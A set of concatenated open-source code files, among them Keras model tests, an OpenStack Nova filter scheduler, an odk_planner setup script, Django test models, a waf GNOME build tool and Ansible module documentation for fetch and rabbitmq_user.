def test_trainable_argument(self):
with self.test_session():
x = np.random.random((5, 3))
y = np.random.random((5, 2))
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_dim=3, trainable=False))
model.compile('rmsprop', 'mse')
out = model.predict(x)
model.train_on_batch(x, y)
out_2 = model.predict(x)
self.assertAllClose(out, out_2)
# test with nesting
inputs = keras.layers.Input(shape=(3,))
output = model(inputs)
model = keras.models.Model(inputs, output)
model.compile('rmsprop', 'mse')
out = model.predict(x)
model.train_on_batch(x, y)
out_2 = model.predict(x)
self.assertAllClose(out, out_2)
def test_layer_trainability_switch(self):
with self.test_session():
# with constructor argument, in Sequential
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, trainable=False, input_dim=1))
self.assertListEqual(model.trainable_weights, [])
# by setting the `trainable` argument, in Sequential
model = keras.models.Sequential()
layer = keras.layers.Dense(2, input_dim=1)
model.add(layer)
self.assertListEqual(model.trainable_weights, layer.trainable_weights)
layer.trainable = False
self.assertListEqual(model.trainable_weights, [])
# with constructor argument, in Model
x = keras.layers.Input(shape=(1,))
y = keras.layers.Dense(2, trainable=False)(x)
model = keras.models.Model(x, y)
self.assertListEqual(model.trainable_weights, [])
# by setting the `trainable` argument, in Model
x = keras.layers.Input(shape=(1,))
layer = keras.layers.Dense(2)
y = layer(x)
model = keras.models.Model(x, y)
self.assertListEqual(model.trainable_weights, layer.trainable_weights)
layer.trainable = False
self.assertListEqual(model.trainable_weights, [])
def test_model_trainability_switch(self):
with self.test_session():
# a non-trainable model has no trainable weights
x = keras.layers.Input(shape=(1,))
y = keras.layers.Dense(2)(x)
model = keras.models.Model(x, y)
model.trainable = False
self.assertListEqual(model.trainable_weights, [])
# same for Sequential
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_dim=1))
model.trainable = False
self.assertListEqual(model.trainable_weights, [])
def test_nested_model_trainability(self):
with self.test_session():
# a Sequential inside a Model
inner_model = keras.models.Sequential()
inner_model.add(keras.layers.Dense(2, input_dim=1))
x = keras.layers.Input(shape=(1,))
y = inner_model(x)
outer_model = keras.models.Model(x, y)
self.assertListEqual(outer_model.trainable_weights,
inner_model.trainable_weights)
inner_model.trainable = False
self.assertListEqual(outer_model.trainable_weights, [])
inner_model.trainable = True
inner_model.layers[-1].trainable = False
self.assertListEqual(outer_model.trainable_weights, [])
# a Sequential inside a Sequential
inner_model = keras.models.Sequential()
inner_model.add(keras.layers.Dense(2, input_dim=1))
outer_model = keras.models.Sequential()
outer_model.add(inner_model)
self.assertListEqual(outer_model.trainable_weights,
inner_model.trainable_weights)
inner_model.trainable = False
self.assertListEqual(outer_model.trainable_weights, [])
inner_model.trainable = True
inner_model.layers[-1].trainable = False
self.assertListEqual(outer_model.trainable_weights, [])
# a Model inside a Model
x = keras.layers.Input(shape=(1,))
y = keras.layers.Dense(2)(x)
inner_model = keras.models.Model(x, y)
x = keras.layers.Input(shape=(1,))
y = inner_model(x)
outer_model = keras.models.Model(x, y)
self.assertListEqual(outer_model.trainable_weights,
inner_model.trainable_weights)
inner_model.trainable = False
self.assertListEqual(outer_model.trainable_weights, [])
inner_model.trainable = True
inner_model.layers[-1].trainable = False
self.assertListEqual(outer_model.trainable_weights, [])
# a Model inside a Sequential
x = keras.layers.Input(shape=(1,))
y = keras.layers.Dense(2)(x)
inner_model = keras.models.Model(x, y)
outer_model = keras.models.Sequential()
outer_model.add(inner_model)
self.assertListEqual(outer_model.trainable_weights,
inner_model.trainable_weights)
inner_model.trainable = False
self.assertListEqual(outer_model.trainable_weights, [])
inner_model.trainable = True
inner_model.layers[-1].trainable = False
self.assertListEqual(outer_model.trainable_weights, [])
class TestGeneratorMethods(test.TestCase):
def test_generator_methods(self):
arr_data = np.random.randint(0, 256, (50, 2))
arr_labels = np.random.randint(0, 2, 50)
def custom_generator():
batch_size = 10
n_samples = 50
while True:
batch_index = np.random.randint(0, n_samples - batch_size)
start = batch_index
end = start + batch_size
x = arr_data[start: end]
y = arr_labels[start: end]
yield x, y
model = keras.models.Sequential()
model.add(keras.layers.Dense(1, input_shape=(2,)))
model.compile(loss='mse', optimizer='sgd')
model.fit_generator(custom_generator(),
steps_per_epoch=5,
epochs=1,
verbose=1,
max_q_size=10,
workers=4,
pickle_safe=True)
model.fit_generator(custom_generator(),
steps_per_epoch=5,
epochs=1,
verbose=1,
max_q_size=10,
pickle_safe=False)
model.fit_generator(custom_generator(),
steps_per_epoch=5,
epochs=1,
verbose=1,
max_q_size=10,
pickle_safe=False,
validation_data=custom_generator(),
validation_steps=10)
model.predict_generator(custom_generator(),
steps=5,
max_q_size=10,
workers=2,
pickle_safe=True)
model.predict_generator(custom_generator(),
steps=5,
max_q_size=10,
pickle_safe=False)
model.evaluate_generator(custom_generator(),
steps=5,
max_q_size=10,
workers=2,
pickle_safe=True)
model.evaluate_generator(custom_generator(),
steps=5,
max_q_size=10,
pickle_safe=False)
if __name__ == '__main__':
test.main()
|
apache-2.0
|
eneabio/nova
|
nova/scheduler/filter_scheduler.py
|
1
|
11203
|
# Copyright (c) 2011 OpenStack, LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
The FilterScheduler is for creating instances locally.
You can customize this scheduler by specifying your own Host Filters and
Weighing Functions.
"""
import operator
from nova import exception
from nova import flags
from nova import log as logging
from nova.notifier import api as notifier
from nova.scheduler import driver
from nova.scheduler import least_cost
from nova.scheduler import scheduler_options
from nova.scheduler import api
from nova import utils
FLAGS = flags.FLAGS
LOG = logging.getLogger(__name__)
class FilterScheduler(driver.Scheduler):
"""Scheduler that can be used for filtering and weighing."""
def __init__(self, *args, **kwargs):
super(FilterScheduler, self).__init__(*args, **kwargs)
self.cost_function_cache = {}
self.options = scheduler_options.SchedulerOptions()
def schedule(self, context, topic, method, *args, **kwargs):
"""The schedule() contract requires we return the one
best-suited host for this request.
NOTE: We're only focused on compute instances right now,
so this method will always raise NoValidHost()."""
msg = _("No host selection for %s defined.") % topic
raise exception.NoValidHost(reason=msg)
def schedule_run_instance(self, context, request_spec, *args, **kwargs):
"""This method is called from nova.compute.api to provision
an instance. We first create a build plan (a list of WeightedHosts)
and then provision.
Returns a list of the instances created.
"""
elevated = context.elevated()
num_instances = request_spec.get('num_instances', 1)
LOG.debug(_("Attempting to build %(num_instances)d instance(s)") %
locals())
payload = dict(request_spec=request_spec)
notifier.notify(notifier.publisher_id("scheduler"),
'scheduler.run_instance.start', notifier.INFO, payload)
weighted_hosts = self._schedule(context, "compute", request_spec,
*args, **kwargs)
if not weighted_hosts:
raise exception.NoValidHost(reason="")
# NOTE(comstud): Make sure we do not pass this through. It
# contains an instance of RpcContext that cannot be serialized.
kwargs.pop('filter_properties', None)
instances = []
for num in xrange(num_instances):
if not weighted_hosts:
break
weighted_host = weighted_hosts.pop(0)
request_spec['instance_properties']['launch_index'] = num
instance = self._provision_resource(elevated, weighted_host,
request_spec, kwargs)
if instance:
instances.append(instance)
notifier.notify(notifier.publisher_id("scheduler"),
'scheduler.run_instance.end', notifier.INFO, payload)
return instances
def schedule_prep_resize(self, context, request_spec, *args, **kwargs):
"""Select a target for resize.
Selects a target host for the instance, post-resize, and casts
the prep_resize operation to it.
"""
hosts = self._schedule(context, 'compute', request_spec,
*args, **kwargs)
if not hosts:
raise exception.NoValidHost(reason="")
host = hosts.pop(0)
# NOTE(comstud): Make sure we do not pass this through. It
# contains an instance of RpcContext that cannot be serialized.
kwargs.pop('filter_properties', None)
# Forward off to the host
driver.cast_to_compute_host(context, host.host_state.host,
'prep_resize', **kwargs)
def _provision_resource(self, context, weighted_host, request_spec,
kwargs):
"""Create the requested resource in this Zone."""
instance = self.create_instance_db_entry(context, request_spec)
payload = dict(request_spec=request_spec,
weighted_host=weighted_host.to_dict(),
instance_id=instance['uuid'])
notifier.notify(notifier.publisher_id("scheduler"),
'scheduler.run_instance.scheduled', notifier.INFO,
payload)
driver.cast_to_compute_host(context, weighted_host.host_state.host,
'run_instance', instance_uuid=instance['uuid'], **kwargs)
inst = driver.encode_instance(instance, local=True)
# So if another instance is created, create_instance_db_entry will
# actually create a new entry, instead of assume it's been created
# already
del request_spec['instance_properties']['uuid']
return inst
def _get_configuration_options(self):
"""Fetch options dictionary. Broken out for testing."""
return self.options.get_configuration()
def populate_filter_properties(self, request_spec, filter_properties):
"""Stuff things into filter_properties. Can be overriden in a
subclass to add more data.
"""
pass
def _schedule(self, context, topic, request_spec, *args, **kwargs):
"""Returns a list of hosts that meet the required specs,
ordered by their fitness.
"""
elevated = context.elevated()
if topic != "compute":
msg = _("Scheduler only understands Compute nodes (for now)")
raise NotImplementedError(msg)
instance_properties = request_spec['instance_properties']
instance_type = request_spec.get("instance_type", None)
cost_functions = self.get_cost_functions()
config_options = self._get_configuration_options()
filter_properties = kwargs.get('filter_properties', {})
filter_properties.update({'context': context,
'request_spec': request_spec,
'config_options': config_options,
'instance_type': instance_type})
#Eneabegin
LOG.debug(_('Enea: attributi in _schedule di filter_properties %(attributi)s in '),
{'attributi': filter_properties.__getattribute__})
#Eneaend
self.populate_filter_properties(request_spec,
filter_properties)
# Find our local list of acceptable hosts by repeatedly
# filtering and weighing our options. Each time we choose a
# host, we virtually consume resources on it so subsequent
# selections can adjust accordingly.
# unfiltered_hosts_dict is {host : ZoneManager.HostInfo()}
unfiltered_hosts_dict = self.host_manager.get_all_host_states(
elevated, topic)
# Note: remember, we are using an iterator here. So only
# traverse this list once. This can bite you if the hosts
# are being scanned in a filter or weighing function.
hosts = unfiltered_hosts_dict.itervalues()
num_instances = request_spec.get('num_instances', 1)
selected_hosts = []
for num in xrange(num_instances):
# Filter local hosts based on requirements ...
hosts = self.host_manager.filter_hosts(hosts,
filter_properties)
if not hosts:
# Can't get any more locally.
break
LOG.debug(_("Filtered %(hosts)s") % locals())
# weighted_host = WeightedHost() ... the best
# host for the job.
# TODO(comstud): filter_properties will also be used for
# weighing and I plan fold weighing into the host manager
# in a future patch. I'll address the naming of this
# variable at that time.
#Eneabegin
LOG.debug(_("Enea: property of host %(hosts)s") % locals())
#Eneaend
weighted_host = least_cost.weighted_sum(cost_functions,
hosts, filter_properties)
LOG.debug(_("Weighted %(weighted_host)s") % locals())
selected_hosts.append(weighted_host)
# Now consume the resources so the filter/weights
# will change for the next instance.
weighted_host.host_state.consume_from_instance(
instance_properties)
selected_hosts.sort(key=operator.attrgetter('weight'))
#Enea_begin
if len(selected_hosts)>0:
LOG.debug(_('Enea: First weight host: %(weight)s and selected hosts: %(selected_hosts)s and host_state[0]: %(attribute)s'),
{'selected_hosts': selected_hosts,
'attribute': selected_hosts[0].__getattribute__,
'weight': selected_hosts[0].weight})
#Enea_end
return selected_hosts[:num_instances]
def get_cost_functions(self, topic=None):
"""Returns a list of tuples containing weights and cost functions to
use for weighing hosts
"""
if topic is None:
# Schedulers only support compute right now.
topic = "compute"
if topic in self.cost_function_cache:
return self.cost_function_cache[topic]
cost_fns = []
for cost_fn_str in FLAGS.least_cost_functions:
if '.' in cost_fn_str:
short_name = cost_fn_str.split('.')[-1]
else:
short_name = cost_fn_str
cost_fn_str = "%s.%s.%s" % (
__name__, self.__class__.__name__, short_name)
if not (short_name.startswith('%s_' % topic) or
short_name.startswith('noop')):
continue
try:
# NOTE: import_class is somewhat misnamed since
# the weighing function can be any non-class callable
# (i.e., no 'self')
cost_fn = utils.import_class(cost_fn_str)
except exception.ClassNotFound:
raise exception.SchedulerCostFunctionNotFound(
cost_fn_str=cost_fn_str)
try:
flag_name = "%s_weight" % cost_fn.__name__
weight = getattr(FLAGS, flag_name)
except AttributeError:
raise exception.SchedulerWeightFlagNotFound(
flag_name=flag_name)
cost_fns.append((weight, cost_fn))
self.cost_function_cache[topic] = cost_fns
return cost_fns
|
apache-2.0
|
SwissTPH/odk_planner
|
tools/create_instance.py
|
1
|
3752
|
"""Creates a new instance with default configuration files
this script creates a new instance with the default configuration files from
the ``demo/config`` directory, asking the user for MySQL credentials, and
also creating a temporary password that has to be used for first login
"""
import sys, ConfigParser, os, os.path, string, shutil, random
if len(sys.argv) > 2 or sum([arg.startswith('-') for arg in sys.argv[1:]]):
print('\nusage:\n %s [template.ini]\n' % sys.argv[0])
sys.exit(-1)
def ask(question, default=None):
if default is None:
return raw_input(question)
else:
ret = raw_input(question + ' [%s] ' % default)
if ret:
return ret
else:
return default
def askchoice(question, choices):
while True:
answer = raw_input(question + ' (%s) ' % ','.join(choices))
if answer in choices: return answer
def askyn(question):
return askchoice(question, ('y', 'n')) == 'y'
def makepass(length):
chars = string.letters + string.digits
return ''.join([random.choice(chars) for i in range(length)])
demodir = os.path.join(os.path.dirname(__file__), os.path.pardir, 'test', 'demo')
configdir = os.path.join(demodir, 'config')
xlssrc = os.path.join(configdir, 'config-sample.xls')
inisrc = os.path.join(configdir, 'config-sample.ini')
instancedir = os.path.join(demodir, os.path.pardir, os.path.pardir, 'instances')
# set umask to generate files with group write access
os.umask(2)
# preparse ini
cp = ConfigParser.RawConfigParser()
if len(sys.argv) > 1:
if not os.path.exists(sys.argv[1]):
print('\n*** cannot open "%s"\n' % sys.argv[1])
sys.exit(-2)
inisrc = sys.argv[1]
cp.read(inisrc)
# ask information, check instance does not exist yet
print('''
this script will create a new odk_planner instance
--------------------------------------------------
''')
instance_name = ask('instance name: ')
instance_root = os.path.join(instancedir, instance_name)
if os.path.exists(instance_root):
print('CANNOT CREATE instance with name "%s" : path "%s" exists already!' %
(instance_name, instance_root))
raw_input('press <ENTER> to continue...')
sys.exit(-1)
os.mkdir(instance_root)
# modify config settings
for section in cp.sections():
print(section + '\n' + '-' * len(section))
for name, value in cp.items(section):
value = ask(' - ' + name, cp.get(section, name))
if ' ' in value and not (
value.startswith('"') and value.endswith('"')):
value = '"%s"' % value
cp.set(section, name, value)
# create directories
for subdir in ('config', 'log', 'forms'):
os.mkdir(os.path.join(instance_root, subdir))
# copy config files
xlsdst = os.path.join(instance_root, 'config', 'config.xls')
inidst = os.path.join(instance_root, 'config', 'config.ini')
cp.write(file(os.path.join(inidst), 'w'))
shutil.copyfile(xlssrc, xlsdst)
# try setting group id
st = os.stat(instancedir)
os.chown(instance_root, -1, st.st_gid)
for root, dirs, files in os.walk(instance_root):
for leaf in dirs + files:
os.chown(os.path.join(root, leaf), -1, st.st_gid)
# generate temporary password
passpath = os.path.join(instance_root, 'config', 'TMPPASS')
tmppass = makepass(8)
file(passpath, 'w').write(tmppass)
# output to user
print('''
generated new instance:
- name: {instance_name}
- temporary password: {tmppass}
make sure that the directory "instances/{instance_name}/" and all its contents are
writable by the apache user (this should automatically be the case if the
directory "instances/" has the right group ownership)
'''.format(
instance_name=instance_name, tmppass=tmppass))
raw_input('press <ENTER> to continue...')
|
gpl-2.0
|
v0lk3r/ansible-modules-core
|
files/fetch.py
|
94
|
3057
|
# this is a virtual module that is entirely implemented server side
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: fetch
short_description: Fetches a file from remote nodes
description:
- This module works like M(copy), but in reverse. It is used for fetching
files from remote machines and storing them locally in a file tree,
organized by hostname. Note that this module is written to transfer
log files that might not be present, so a missing remote file won't
be an error unless fail_on_missing is set to 'yes'.
version_added: "0.2"
options:
src:
description:
- The file on the remote system to fetch. This I(must) be a file, not a
directory. Recursive fetching may be supported in a later release.
required: true
default: null
aliases: []
dest:
description:
- A directory to save the file into. For example, if the I(dest)
directory is C(/backup) a I(src) file named C(/etc/profile) on host
C(host.example.com), would be saved into
C(/backup/host.example.com/etc/profile)
required: true
default: null
fail_on_missing:
version_added: "1.1"
description:
- Makes it fails when the source file is missing.
required: false
choices: [ "yes", "no" ]
default: "no"
validate_checksum:
version_added: "1.4"
description:
- Verify that the source and destination checksums match after the files are fetched.
required: false
choices: [ "yes", "no" ]
default: "yes"
aliases: [ "validate_md5" ]
flat:
version_added: "1.2"
description:
- Allows you to override the default behavior of appending
hostname/path/to/file to the destination. If dest ends with '/', it
will use the basename of the source file, similar to the copy module.
Obviously this is only handy if the filenames are unique.
requirements: []
author:
- "Ansible Core Team"
- "Michael DeHaan"
'''
EXAMPLES = '''
# Store file into /tmp/fetched/host.example.com/tmp/somefile
- fetch: src=/tmp/somefile dest=/tmp/fetched
# Specifying a path directly
- fetch: src=/tmp/somefile dest=/tmp/prefix-{{ ansible_hostname }} flat=yes
# Specifying a destination path
- fetch: src=/tmp/uniquefile dest=/tmp/special/ flat=yes
# Storing in a path relative to the playbook
- fetch: src=/tmp/uniquefile dest=special/prefix-{{ ansible_hostname }} flat=yes
'''
|
gpl-3.0
|
blindroot/django
|
tests/admin_widgets/models.py
|
49
|
4830
|
from __future__ import unicode_literals
from django.contrib.auth.models import User
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
class MyFileField(models.FileField):
pass
@python_2_unicode_compatible
class Member(models.Model):
name = models.CharField(max_length=100)
birthdate = models.DateTimeField(blank=True, null=True)
gender = models.CharField(max_length=1, blank=True, choices=[('M', 'Male'), ('F', 'Female')])
email = models.EmailField(blank=True)
def __str__(self):
return self.name
@python_2_unicode_compatible
class Band(models.Model):
name = models.CharField(max_length=100)
style = models.CharField(max_length=20)
members = models.ManyToManyField(Member)
def __str__(self):
return self.name
@python_2_unicode_compatible
class Album(models.Model):
band = models.ForeignKey(Band, models.CASCADE)
name = models.CharField(max_length=100)
cover_art = models.FileField(upload_to='albums')
backside_art = MyFileField(upload_to='albums_back', null=True)
def __str__(self):
return self.name
class HiddenInventoryManager(models.Manager):
def get_queryset(self):
return super(HiddenInventoryManager, self).get_queryset().filter(hidden=False)
@python_2_unicode_compatible
class Inventory(models.Model):
barcode = models.PositiveIntegerField(unique=True)
parent = models.ForeignKey('self', models.SET_NULL, to_field='barcode', blank=True, null=True)
name = models.CharField(blank=False, max_length=20)
hidden = models.BooleanField(default=False)
# see #9258
default_manager = models.Manager()
objects = HiddenInventoryManager()
def __str__(self):
return self.name
class Event(models.Model):
main_band = models.ForeignKey(
Band,
models.CASCADE,
limit_choices_to=models.Q(pk__gt=0),
related_name='events_main_band_at',
)
supporting_bands = models.ManyToManyField(
Band,
blank=True,
related_name='events_supporting_band_at',
help_text='Supporting Bands.',
)
start_date = models.DateField(blank=True, null=True)
start_time = models.TimeField(blank=True, null=True)
description = models.TextField(blank=True)
link = models.URLField(blank=True)
min_age = models.IntegerField(blank=True, null=True)
@python_2_unicode_compatible
class Car(models.Model):
owner = models.ForeignKey(User, models.CASCADE)
make = models.CharField(max_length=30)
model = models.CharField(max_length=30)
def __str__(self):
return "%s %s" % (self.make, self.model)
class CarTire(models.Model):
"""
A single car tire. This to test that a user can only select their own cars.
"""
car = models.ForeignKey(Car, models.CASCADE)
class Honeycomb(models.Model):
location = models.CharField(max_length=20)
class Bee(models.Model):
"""
A model with a FK to a model that won't be registered with the admin
(Honeycomb) so the corresponding raw ID widget won't have a magnifying
glass link to select related honeycomb instances.
"""
honeycomb = models.ForeignKey(Honeycomb, models.CASCADE)
class Individual(models.Model):
"""
A model with a FK to itself. It won't be registered with the admin, so the
corresponding raw ID widget won't have a magnifying glass link to select
related instances (rendering will be called programmatically in this case).
"""
name = models.CharField(max_length=20)
parent = models.ForeignKey('self', models.SET_NULL, null=True)
soulmate = models.ForeignKey('self', models.CASCADE, null=True, related_name='soulmates')
class Company(models.Model):
name = models.CharField(max_length=20)
class Advisor(models.Model):
"""
A model with a m2m to a model that won't be registered with the admin
(Company) so the corresponding raw ID widget won't have a magnifying
glass link to select related company instances.
"""
name = models.CharField(max_length=20)
companies = models.ManyToManyField(Company)
@python_2_unicode_compatible
class Student(models.Model):
name = models.CharField(max_length=255)
def __str__(self):
return self.name
class Meta:
ordering = ('name',)
@python_2_unicode_compatible
class School(models.Model):
name = models.CharField(max_length=255)
students = models.ManyToManyField(Student, related_name='current_schools')
alumni = models.ManyToManyField(Student, related_name='previous_schools')
def __str__(self):
return self.name
@python_2_unicode_compatible
class Profile(models.Model):
user = models.ForeignKey('auth.User', models.CASCADE, to_field='username')
def __str__(self):
return self.user.username
|
bsd-3-clause
|
coolblaze03/WSNNS3Port
|
.waf-1.5.16-e6d03192b5ddfa5ef2c8d65308e48e42/wafadmin/Tools/gnome.py
|
6
|
6844
|
#! /usr/bin/env python
# encoding: utf-8
import os,re
import TaskGen,Utils,Runner,Task,Build,Options,Logs
import cc
from Logs import error
from TaskGen import taskgen,before,after,feature
n1_regexp=re.compile('<refentrytitle>(.*)</refentrytitle>',re.M)
n2_regexp=re.compile('<manvolnum>(.*)</manvolnum>',re.M)
def postinstall_schemas(prog_name):
if Build.bld.is_install:
dir=Build.bld.get_install_path('${PREFIX}/etc/gconf/schemas/%s.schemas'%prog_name)
if not Options.options.destdir:
Utils.pprint('YELLOW','Installing GConf schema')
command='gconftool-2 --install-schema-file=%s 1> /dev/null'%dir
ret=Utils.exec_command(command)
else:
Utils.pprint('YELLOW','GConf schema not installed. After install, run this:')
Utils.pprint('YELLOW','gconftool-2 --install-schema-file=%s'%dir)
def postinstall_icons():
dir=Build.bld.get_install_path('${DATADIR}/icons/hicolor')
if Build.bld.is_install:
if not Options.options.destdir:
Utils.pprint('YELLOW',"Updating Gtk icon cache.")
command='gtk-update-icon-cache -q -f -t %s'%dir
ret=Utils.exec_command(command)
else:
Utils.pprint('YELLOW','Icon cache not updated. After install, run this:')
Utils.pprint('YELLOW','gtk-update-icon-cache -q -f -t %s'%dir)
def postinstall_scrollkeeper(prog_name):
if Build.bld.is_install:
if os.access('/var/log/scrollkeeper.log',os.W_OK):
dir1=Build.bld.get_install_path('${PREFIX}/var/scrollkeeper')
dir2=Build.bld.get_install_path('${DATADIR}/omf/%s'%prog_name)
command='scrollkeeper-update -q -p %s -o %s'%(dir1,dir2)
ret=Utils.exec_command(command)
def postinstall(prog_name='myapp',schemas=1,icons=1,scrollkeeper=1):
if schemas:postinstall_schemas(prog_name)
if icons:postinstall_icons()
if scrollkeeper:postinstall_scrollkeeper(prog_name)
class gnome_doc_taskgen(TaskGen.task_gen):
def __init__(self,*k,**kw):
TaskGen.task_gen.__init__(self,*k,**kw)
def init_gnome_doc(self):
self.default_install_path='${PREFIX}/share'
def apply_gnome_doc(self):
self.env['APPNAME']=self.doc_module
lst=self.to_list(self.doc_linguas)
bld=self.bld
lst.append('C')
for x in lst:
if not x=='C':
tsk=self.create_task('xml2po')
node=self.path.find_resource(x+'/'+x+'.po')
src=self.path.find_resource('C/%s.xml'%self.doc_module)
out=self.path.find_or_declare('%s/%s.xml'%(x,self.doc_module))
tsk.set_inputs([node,src])
tsk.set_outputs(out)
else:
out=self.path.find_resource('%s/%s.xml'%(x,self.doc_module))
tsk2=self.create_task('xsltproc2po')
out2=self.path.find_or_declare('%s/%s-%s.omf'%(x,self.doc_module,x))
tsk2.set_outputs(out2)
node=self.path.find_resource(self.doc_module+".omf.in")
tsk2.inputs=[node,out]
tsk2.run_after.append(tsk)
if bld.is_install:
path=self.install_path+'/gnome/help/%s/%s'%(self.doc_module,x)
bld.install_files(self.install_path+'/omf',out2,env=self.env)
for y in self.to_list(self.doc_figures):
try:
os.stat(self.path.abspath()+'/'+x+'/'+y)
bld.install_as(path+'/'+y,self.path.abspath()+'/'+x+'/'+y)
except:
bld.install_as(path+'/'+y,self.path.abspath()+'/C/'+y)
bld.install_as(path+'/%s.xml'%self.doc_module,out.abspath(self.env))
if x=='C':
xmls=self.to_list(self.doc_includes)
xmls.append(self.doc_entities)
for z in xmls:
out=self.path.find_resource('%s/%s'%(x,z))
bld.install_as(path+'/%s'%z,out.abspath(self.env))
class xml_to_taskgen(TaskGen.task_gen):
def __init__(self,*k,**kw):
TaskGen.task_gen.__init__(self,*k,**kw)
def init_xml_to(self):
Utils.def_attrs(self,source='xmlfile',xslt='xlsltfile',target='hey',default_install_path='${PREFIX}',task_created=None)
def apply_xml_to(self):
xmlfile=self.path.find_resource(self.source)
xsltfile=self.path.find_resource(self.xslt)
tsk=self.create_task('xmlto',[xmlfile,xsltfile],xmlfile.change_ext('html'))
tsk.install_path=self.install_path
def sgml_scan(self):
node=self.inputs[0]
env=self.env
variant=node.variant(env)
fi=open(node.abspath(env),'r')
content=fi.read()
fi.close()
name=n1_regexp.findall(content)[0]
num=n2_regexp.findall(content)[0]
doc_name=name+'.'+num
if not self.outputs:
self.outputs=[self.generator.path.find_or_declare(doc_name)]
return([],[doc_name])
class gnome_sgml2man_taskgen(TaskGen.task_gen):
def __init__(self,*k,**kw):
TaskGen.task_gen.__init__(self,*k,**kw)
def apply_gnome_sgml2man(self):
assert(getattr(self,'appname',None))
def install_result(task):
out=task.outputs[0]
name=out.name
ext=name[-1]
env=task.env
self.bld.install_files('${DATADIR}/man/man%s/'%ext,out,env)
self.bld.rescan(self.path)
for name in self.bld.cache_dir_contents[self.path.id]:
base,ext=os.path.splitext(name)
if ext!='.sgml':continue
task=self.create_task('sgml2man')
task.set_inputs(self.path.find_resource(name))
task.task_generator=self
if self.bld.is_install:task.install=install_result
task.scan()
cls=Task.simple_task_type('sgml2man','${SGML2MAN} -o ${TGT[0].bld_dir(env)} ${SRC} > /dev/null',color='BLUE')
cls.scan=sgml_scan
cls.quiet=1
Task.simple_task_type('xmlto','${XMLTO} html -m ${SRC[1].abspath(env)} ${SRC[0].abspath(env)}')
Task.simple_task_type('xml2po','${XML2PO} ${XML2POFLAGS} ${SRC} > ${TGT}',color='BLUE')
xslt_magic="""${XSLTPROC2PO} -o ${TGT[0].abspath(env)} \
--stringparam db2omf.basename ${APPNAME} \
--stringparam db2omf.format docbook \
--stringparam db2omf.lang ${TGT[0].abspath(env)[:-4].split('-')[-1]} \
--stringparam db2omf.dtd '-//OASIS//DTD DocBook XML V4.3//EN' \
--stringparam db2omf.omf_dir ${PREFIX}/share/omf \
--stringparam db2omf.help_dir ${PREFIX}/share/gnome/help \
--stringparam db2omf.omf_in ${SRC[0].abspath(env)} \
--stringparam db2omf.scrollkeeper_cl ${SCROLLKEEPER_DATADIR}/Templates/C/scrollkeeper_cl.xml \
${DB2OMF} ${SRC[1].abspath(env)}"""
Task.simple_task_type('xsltproc2po',xslt_magic,color='BLUE')
def detect(conf):
conf.check_tool('gnu_dirs glib2 dbus')
sgml2man=conf.find_program('docbook2man',var='SGML2MAN')
def getstr(varname):
return getattr(Options.options,varname,'')
conf.define('GNOMELOCALEDIR',os.path.join(conf.env['DATADIR'],'locale'))
xml2po=conf.find_program('xml2po',var='XML2PO')
xsltproc2po=conf.find_program('xsltproc',var='XSLTPROC2PO')
conf.env['XML2POFLAGS']='-e -p'
conf.env['SCROLLKEEPER_DATADIR']=Utils.cmd_output("scrollkeeper-config --pkgdatadir",silent=1).strip()
conf.env['DB2OMF']=Utils.cmd_output("/usr/bin/pkg-config --variable db2omf gnome-doc-utils",silent=1).strip()
def set_options(opt):
opt.add_option('--want-rpath',type='int',default=1,dest='want_rpath',help='set rpath to 1 or 0 [Default 1]')
feature('gnome_doc')(init_gnome_doc)
feature('gnome_doc')(apply_gnome_doc)
after('init_gnome_doc')(apply_gnome_doc)
feature('xml_to')(init_xml_to)
feature('xml_to')(apply_xml_to)
after('init_xml_to')(apply_xml_to)
feature('gnome_sgml2man')(apply_gnome_sgml2man)
|
gpl-2.0
|
bregman-arie/ansible
|
lib/ansible/modules/messaging/rabbitmq_user.py
|
15
|
9514
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013, Chatham Financial <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: rabbitmq_user
short_description: Adds or removes users to RabbitMQ
description:
- Add or remove users to RabbitMQ and assign permissions
version_added: "1.1"
author: '"Chris Hoffman (@chrishoffman)"'
options:
user:
description:
- Name of user to add
required: true
aliases: [username, name]
password:
description:
- Password of user to add.
- To change the password of an existing user, you must also specify
C(force=yes).
tags:
description:
- User tags specified as comma delimited
permissions:
description:
- a list of dicts, each dict contains vhost, configure_priv, write_priv, and read_priv,
and represents a permission rule for that vhost.
- This option should be preferable when you care about all permissions of the user.
- You should use vhost, configure_priv, write_priv, and read_priv options instead
if you care about permissions for just some vhosts.
default: []
vhost:
description:
- vhost to apply access privileges.
- This option will be ignored when permissions option is used.
default: /
node:
description:
- erlang node name of the rabbit we wish to configure
default: rabbit
version_added: "1.2"
configure_priv:
description:
- Regular expression to restrict configure actions on a resource
for the specified vhost.
- By default all actions are restricted.
- This option will be ignored when permissions option is used.
default: ^$
write_priv:
description:
- Regular expression to restrict configure actions on a resource
for the specified vhost.
- By default all actions are restricted.
- This option will be ignored when permissions option is used.
default: ^$
read_priv:
description:
- Regular expression to restrict configure actions on a resource
for the specified vhost.
- By default all actions are restricted.
- This option will be ignored when permissions option is used.
default: ^$
force:
description:
- Deletes and recreates the user.
type: bool
default: 'no'
state:
description:
- Specify if user is to be added or removed
default: present
choices: [present, absent]
'''
